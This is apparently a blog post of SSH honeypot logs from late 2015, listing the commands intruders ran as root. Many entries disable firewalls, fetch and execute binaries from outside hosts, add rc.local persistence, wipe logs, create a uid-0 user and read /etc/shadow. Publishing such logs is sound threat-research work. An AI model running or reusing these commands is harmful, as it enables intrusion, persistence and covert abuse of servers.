From 82.79.251.246 30-Sep-2015 21:59:33 ssh2 root
w
ifconfig
cat /proc/cpuinfo
exit

From 151.80.154.135  1-Oct-2015 02:52:37 ssh2 root
w
ifconfig
cat /etc/issue
cat /etc/redhat-release

From 109.236.91.85  1-Oct-2015 07:45:41 ssh2 root
cd /var/tmp
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
wget http://djsony.ucoz.com/shadowfire.jpg
wget

From 221.12.62.162  1-Oct-2015 12:38:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:7926/lxw520;chmod 777 lxw520;sh lxw520;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://221.12.62.162:7926/lxw520
chmod 777 lxw520
sh lxw520

From 221.12.62.162  1-Oct-2015 17:31:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget -c http://221.12.62.162:7926/lxwjt;chmod 777 lxwjt;sh lxwjt;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c wget -c http://221.12.62.162:7926/lxwjt
chmod 777 lxwjt
sh lxwjt

From 81.18.69.95  2-Oct-2015 17:57:09 ssh2 root
w
reboot
exit

From 85.9.20.151  3-Oct-2015 13:29:25 ssh2 root
uname -a
w
cd /var/tmp
ls -a
cat /etc/issue
cat /etc/passwd
uptime
uname -a
wget
ftp
useradd postgres
adduser postgres
sudo
id

From 85.9.20.151  3-Oct-2015 18:22:29 ssh2 root
ls
wget superuser.000webhost.com/psy.tgz
wget 31.170.160.59/psy.tgz
ftp files.000webhost.com

From 121.12.173.62  4-Oct-2015 11:12:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-25;chmod 0775 duge-25;./duge-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/duge-25
chmod 0775 duge-25
./duge-25

From 185.45.12.212 11-Oct-2015 11:59:01 ssh2 root
mkdir " "
ls

From 222.186.30.215 16-Oct-2015 12:59:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.15.216.27:2015/xdg1;chmod 777 xdg1;./xdg1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://198.15.216.27:2015/xdg1
chmod 777 xdg1
./xdg1

From 183.131.51.254 23-Oct-2015 17:03:01 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://183.131.51.254:10101/wdds;
chmod 777 wdds;
./wdds;
echo "cd /tmp/">>/etc/rc.local;
echo "./wdds&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://183.131.51.254:10101/91;
chmod 777 91;
./91;
echo "cd /tmp/">>/etc/rc.local;
echo "./91&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://183.131.51.254:10101/wdds
chmod 777 wdds
./wdds
echo "cd /tmp/">>/etc/rc.local
echo "./wdds&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://183.131.51.254:10101/91
chmod 777 91
./91
echo "cd /tmp/">>/etc/rc.local
echo "./91&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.12.173.62 24-Oct-2015 07:16:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 0755 jiao-25;./jiao-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/jiao-25
chmod 0755 jiao-25
./jiao-25

From 184.179.15.71 26-Oct-2015 12:25:57 ssh2 root
Exec

From 185.82.203.243 27-Oct-2015 03:05:09 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://185.82.203.243:5566/32x86;
chmod 777 32x86;
./32x86;
echo "cd /tmp/">>/etc/rc.local;
echo "./32x86&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://185.82.203.243:5566/google;
chmod 777 google;
./google;
echo "cd /tmp/">>/etc/rc.local;
echo "./google&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://185.82.203.243:5566/32x86
chmod 777 32x86
./32x86
echo "cd /tmp/">>/etc/rc.local
echo "./32x86&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://185.82.203.243:5566/google
chmod 777 google
./google
echo "cd /tmp/">>/etc/rc.local
echo "./google&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 185.82.203.243 27-Oct-2015 22:37:25 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://185.82.203.243:5566/32x86;
chmod 777 32x86;
./32x86;
echo "cd /tmp/">>/etc/rc.local;
echo "./32x86&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://185.82.203.243:5566/32x86
chmod 777 32x86
./32x86
echo "cd /tmp/">>/etc/rc.local
echo "./32x86&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.30.215 28-Oct-2015 13:46:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://198.15.216.27:2015/.xdsy;chmod 777 .xdsy;./.xdsy;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://198.15.216.27:2015/.xdsy
chmod 777 .xdsy
./.xdsy

From 185.82.203.243 28-Oct-2015 23:02:45 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd ..;
cd /tmp;

wget -c http://185.82.203.243:5566/u6789;
chmod 777 u6789;
./u6789;
echo "cd /tmp/">>/etc/rc.local;
echo "./u6789&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://185.82.203.243:5566/s6789;
chmod 777 s6789;
./s6789;
echo "cd /tmp/">>/etc/rc.local;
echo "./s6789&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd ..
cd /tmp
wget -c http://185.82.203.243:5566/u6789
chmod 777 u6789
./u6789
echo "cd /tmp/">>/etc/rc.local
echo "./u6789&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://185.82.203.243:5566/s6789
chmod 777 s6789
./s6789
echo "cd /tmp/">>/etc/rc.local
echo "./s6789&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 46.102.77.170 29-Oct-2015 08:48:53 ssh2 root
w
ifconfig
passwd
cd ~ mkdir .ssh cd .ssh echo "ssh-rsa
chmod 600 ~/.ssh/authorized_keys cd ~ mkdir lib cd
chmod 600 ~/.ssh/authorized_keys cd ~ mkdir autofsd cd
chmod 600 ~/.ssh/authorized_keys

From 46.102.77.170 29-Oct-2015 13:41:57 ssh2 root
/usr/sbin/useradd -o -u 0 public

From 46.102.77.170 29-Oct-2015 18:35:01 ssh2 root
cd
ls -a

From 46.102.77.170 29-Oct-2015 23:28:05 ssh2 root
cd .mozilla
ls -a

From 46.102.77.170 30-Oct-2015 04:21:09 ssh2 root
wget http://quit.tk/irc/unixbnc.jpg
tar xvf unixbnc.jpg
rm -rf unixbnc.jpg

From 46.102.77.170 30-Oct-2015 09:14:13 ssh2 root
-c
w

From 46.102.77.170 30-Oct-2015 14:07:17 ssh2 root
passwd
uname -a
sudo passwd
passwd root
clear
unset
sudo passwd
cat /etc/shadow
useradd public
cat /etc/passwd
w
shell
help
?

From 46.102.77.170 30-Oct-2015 19:00:21 ssh2 root
msgid
msgstr

From 82.32.154.83 30-Oct-2015 23:53:25 ssh2 root
cd /dev/shm/
wget risc.hi2.ro/irc/dronabuna.jpg
tar xzvf dronabuna.jpg
rm -rf dronabuna.jpg
cd .p
wget risc.hi2.ro/irc/dronabuna.jpg

From 82.32.154.83 31-Oct-2015 04:46:29 ssh2 root
wget
yum install wget
apt get install wget
apt-get install wget

From 82.32.154.83 31-Oct-2015 09:39:33 ssh2 root
cd /dev/shm/
wget risc.hi2.ro/irc/dronabuna.jpg
wget www.risc.hi2.ro/irc/dronabuna.jpg

From 82.32.154.83 31-Oct-2015 14:32:37 ssh2 root
sudo apt-get install wget
apt-get install wget
aptitude install znc
ls
cd
aptitude install znc
sudo yum install znc
apt-get install znc
sudo -u znc znc --makeconf # this creates
sudo apt-get update
apt-get update
ls
ls -a
wget http://znc.in/releases/znc-1.6.5.tar.gz
sudo apt-get update && sudo apt-get upgrade -y
apt-get update && sudo apt-get upgrade -y
wget http://znc.in/releases/znc-1.6.0.tar.gz
ls -a
find . -name '*znc
apt-get install znc
ls
apt-cache search znc
find / -name znc
curl -O www.risc.hi2.ro/irc/dronabuna.jpg
echo www.risc.hi2.ro/irc/dronabuna.jpg
ls
w
cat /etc/issue
ls
cd
cat /etc/issue

From 82.32.154.83 31-Oct-2015 19:25:41 ssh2 root
/usr/sbin/useradd comeo
who
w
cat /etc/passwd
ls
wget
wget -c www.risc.hi2.ro/irc/dronabuna.jpg

From 31.25.140.5  3-Nov-2015 01:09:25 ssh2 root
pwx
pwd
la
ls
cd /var
ls

From 109.236.91.85  3-Nov-2015 06:02:29 ssh2 root
cd ..
la
ls
pwd
ls -la
perl test1.pl
cat test1.pl
cat wotk.pl
exit

From 31.25.140.5  3-Nov-2015 10:55:33 ssh2 root
last -10
uname -a
hostname kurd
ls
cd /vj/s
la
ls
pwd
ls
cd ..
ls
cd ..
ls
lcd
cd ..
lz
s
ls
cd mbox
ls
rm -rf *
ls
exkt
exjt
histkry
history
exit

From 188.241.228.141  3-Nov-2015 15:48:37 ssh2 root
w
cd
ls -a
menu
?
help
ifconfig

From 121.12.173.62  6-Nov-2015 15:06:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/ssd;chmod 0755 ssd;./ssd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/ssd
chmod 0755 ssd
./ssd

From 121.12.173.62  7-Nov-2015 01:27:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-100;chmod 0755 duge-100;./duge-100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/duge-100
chmod 0755 duge-100
./duge-100

From 125.211.202.186  7-Nov-2015 17:29:57 ssh2 root
Exec rm -rf /tmp/ss.exe
rm -rf /tmp/ss.exe

From 125.211.202.186  7-Nov-2015 22:23:01 ssh2 root
Exec scp -t -- /tmp
scp -t -- /tmp

From 125.211.202.186  8-Nov-2015 17:55:17 ssh2 root
Exec sysctl -w vm.nr_hugepages=128 && sysctl -p
sysctl -w vm.nr_hugepages=128 && sysctl -p

From 121.12.173.62 11-Nov-2015 08:57:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-25;chmod 0755 duge-25;./duge-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/duge-25
chmod 0755 duge-25
./duge-25

From 192.99.7.97 12-Nov-2015 19:36:37 ssh2 root
Exec uname -a;cd /tmp;wget http://idiots.ovh/cz;perl cz;rm -rf cz;history -c
uname -a
cd /tmp
wget http://idiots.ovh/cz
perl cz
rm -rf cz
history -c

From 46.102.79.15 14-Nov-2015 00:55:01 ssh2 root
w
ifconfig

From 188.40.81.84 19-Nov-2015 07:54:45 ssh2 root
top
ls
uname -a
cat /proc/info
top
ls /
ls /home
ifconfig
exit

From 188.40.81.84 19-Nov-2015 22:33:57 ssh2 root
top
ls /
nproc
ls -la
ls ./.ssh
ls -la
ls /
cd ..
ls
ls /tmp
exit

From 176.241.185.20 24-Nov-2015 09:04:49 ssh2 root
ls
ifconfig
passwd
znc
uname -a
wget
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
cd ..
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
apt-get
apt-get eggdrop
apt-get install eggdrop
apt-get install znc
znc --makeconf
ls
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
apt-get update
sudo
apt-get install build-essential libssl-dev libperl-dev pkg-config
/usr/local/bin/znc --makeconf
cd /usr/local/src
sudo wget http://znc.in/releases/znc-latest.tar.gz
wget http://znc.in/releases/znc-latest.tar.gz
wget http://znc.in/releases/znc-latest.tar.gz http://znc.in/releases/znc-latest.tar.gz
cd ..
sudo apt-get install build-essential libssl-dev libperl-dev pkg-config checkinstall
wget --no-check-certificate https://github.com/znc/znc/archive/znc-1.2.tar.gz -O - | tar xz
ewxit
exit

From 176.241.185.20 24-Nov-2015 19:47:33 ssh2 root
ls
ifconfig
passwd
znc
uname -a
wget
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
cd ..
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
apt-get
apt-get eggdrop
apt-get install eggdrop
apt-get install znc
znc --makeconf
ls
wget http://ircd.zemra.org/eggdrop/eggdrop-1.8.tar.gz
apt-get update
sudo
apt-get install build-essential libssl-dev libperl-dev pkg-config
/usr/local/bin/znc --makeconf
cd /usr/local/src
sudo wget http://znc.in/releases/znc-latest.tar.gz
wget http://znc.in/releases/znc-latest.tar.gz
wget http://znc.in/releases/znc-latest.tar.gz http://znc.in/releases/znc-latest.tar.gz
cd ..
sudo apt-get install build-essential libssl-dev libperl-dev pkg-config checkinstall
wget --no-check-certificate https://github.com/znc/znc/archive/znc-1.2.tar.gz -O - | tar xz
ewxit
exit

From 176.241.185.20 30-Nov-2015 22:19:33 ssh2 root
passwd
pass
cd ..
wget
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz

From 103.79.141.88  1-Dec-2015 03:12:37 ssh2 root
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
znc
uname -a
sudo
adduser
user
add

From 176.241.185.20  1-Dec-2015 08:05:41 ssh2 root
ls
ps x

From 176.241.185.20  1-Dec-2015 12:58:45 ssh2 root
/sbin/ip
/sbin/show ip
/sbin/ifconfig
cd ..
ls
./eggdrop
nmware
vmware
pico proxy.doc

From 103.207.39.148  1-Dec-2015 17:51:49 ssh2 root
useradd -u gwapo
$sudo usermod
cd root
$sudo usermod
su
uname a
uname -a

From 144.76.100.196  1-Dec-2015 22:44:53 ssh2 root
yum
apt-get install
man
ls -s
yum install
fuser

From 5.188.10.144  2-Dec-2015 03:37:57 ssh2 root
ftp://ftp.openbsd.org/pub/OpenBSD/3.1/packages/i386/nano-1.0.9.tgz

From 46.101.53.21  3-Dec-2015 08:56:21 ssh2 root
Exec uname -a;cd /tmp;wget http://137.118.111.212/bot;perl bot;rm -rf bot*; rm -rf bot.*
uname -a
cd /tmp
wget http://137.118.111.212/bot
perl bot
rm -rf bot*
rm -rf bot.*

From 2.138.57.161 11-Dec-2015 03:03:51 ssh2 root
unset HISTFILE
ps
ls
w
ls -a
netstat -autp
history
cat /etc/passwd
ls -a
wget
curl
cat .bash_istory
uname -a
cat /etc/passwd
nano /etc/passwd
last

From 218.76.82.2 19-Dec-2015 15:41:41 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://124.248.228.62:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://124.248.228.62:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://124.248.228.62:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://124.248.228.62:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://124.248.228.62:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://124.248.228.62:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://124.248.228.62:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://124.248.228.62:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 121.12.173.62 19-Dec-2015 18:03:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 755 jiao-25;./jiao-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/jiao-25
chmod 755 jiao-25
./jiao-25

From 121.12.173.62 21-Dec-2015 11:27:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 775 jiao-25;./jiao-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/jiao-25
chmod 775 jiao-25
./jiao-25

From 218.76.82.2 21-Dec-2015 16:32:21 ssh2 root
Exec /etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;

wget -c http://61.172.235.75:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://61.172.235.75:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://61.172.235.75:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;

wget -c http://61.172.235.75:5720/udp;
chmod 777 udp;
./udp;
echo "cd /tmp/">>/etc/rc.local;
echo "./udp&">>/etc/rc.local;
echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://61.172.235.75:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://61.172.235.75:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://61.172.235.75:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
wget -c http://61.172.235.75:5720/udp
chmod 777 udp
./udp
echo "cd /tmp/">>/etc/rc.local
echo "./udp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 37.201.242.232 22-Dec-2015 21:50:45 ssh2 root
unset HISTFILE
unset HISTSAVE
w
uname -a
cat /proc/cpuinfo
exit

From 37.201.242.232 23-Dec-2015 02:43:49 ssh2 root
unset HISTFILE
cd
cd /home
ls
cat /etc/passwd
ls
exit

From 151.66.123.90 23-Dec-2015 21:12:14 ssh2 root
w
ls -a
uname -a
cat /etc/issue
np
cat /proc/cpuinfo
ls -a
cd /var/tm
ls -a
cd ..
cd /tm
cd /var/tmp
ls -a
cd zzila
ls -a
wget http://rekon.altervista.org/irc/bnc.tgz
ps x
w
ls -a
uname -a
cat /etc/issue
cd
cd ..
ls -a

From 151.66.123.90 24-Dec-2015 08:02:13 ssh2 root
w
ls -a
uname -a
cat /etc/issue
np
cat /proc/cpuinfo
ls -a
cd /var/tm
ls -a
cd ..
cd /tm
cd /var/tmp
ls -a
cd zzila
ls -a
wget
wget http://rekon.altervista.org/irc/bnc.tgz
ps x
w
ls -a
uname -a
cat /etc/issue
cd
cd ..
ls -a

From 121.12.173.62 24-Dec-2015 11:53:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/jiao-25;chmod 777 jiao-25;./jiao-25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/jiao-25
chmod 777 jiao-25
./jiao-25

From 193.201.224.206 24-Dec-2015 12:55:17 ssh2 root
cdn
fetch
lynx
wget

From 121.12.173.62 25-Dec-2015 08:35:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/love;chmod 755 love;./love;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/love
chmod 755 love
./love

From 41.58.204.36 25-Dec-2015 18:13:41 ssh2 root
ls -lia
uname -a

From 45.33.248.245 26-Dec-2015 18:39:01 ssh2 root
wget http://210.245.92.160:9090/miner.tgz
curl -O http://210.245.92.160:9090/miner.tgz

From 121.12.173.62 27-Dec-2015 22:41:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188:454/jiao;chmod 755 jiao;./jiao;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188:454/jiao
chmod 755 jiao
./jiao

From 121.12.173.62 30-Dec-2015 12:47:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 755 pz-100;./pz-100;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:81/pz-100
chmod 755 pz-100
./pz-100

Tags: honeypot, ssh.

Emil's Projects & Reviews

OpenHardware & OpenSource

Add A Comment

Tags

Archive